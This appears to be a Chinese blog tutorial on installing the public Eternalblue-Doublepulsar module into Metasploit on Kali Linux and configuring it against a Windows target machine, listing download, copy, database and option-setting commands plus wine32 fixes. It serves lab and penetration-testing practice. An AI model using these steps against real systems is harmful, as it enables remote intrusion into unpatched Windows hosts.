双脉冲github地址:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
下载zip压缩包,导入到kaili
或者
在kaili使用wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/archive/master.zip​​​​​​​ 进行下载
使用unzip命令进行解压,tar命令无效
将文件夹deps,eternalblue_doublepulsar.rb
cp到msf模块目录下
**/usr/share/metasploit-framework/modules/exploits/windows/smb
**
初始化Msf数据库
1,启动postgresql
service postfresql start
2,初始化数据库
msfdb init

进入msfconsole
查看数据库状态
db_status
进行search查找,或者直接use [路径]

查找Eternalblue模块,use选择模块
use exploit/windows/smb/eternalblue_doublepulsar
查看模块配置
show options
设置必要参数
DOUBLEPULSARPATH
设置攻击库为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps
ETERNALBLUEPATH
设置攻击库/usr/share/metasploit-framework/modules/exploits/windows/smb/deps
PROCESSINJECT
设置附着在靶机运行的进程名称
RHOSTS
靶机IP地址
Exploit target
可以忽略,自动选择系统版本,也可以自行set target 进行设置
TARGETARCHITECTURE
根据靶机系统位数设置x64或x86

运行如出现错误请打开多架构支持/安装win32
wine -h
再次运行模块还会出现报错,运行如下命令
dpkg –add-architecture i386 && apt-get update && apt-get install wine32
如不能安装,请更新镜像源
镜像源文件在/etc/apt/sources.list文件

最后修改:2019 年 11 月 26 日 05 : 15 PM
如果觉得我的文章对你有用,请随意赞赏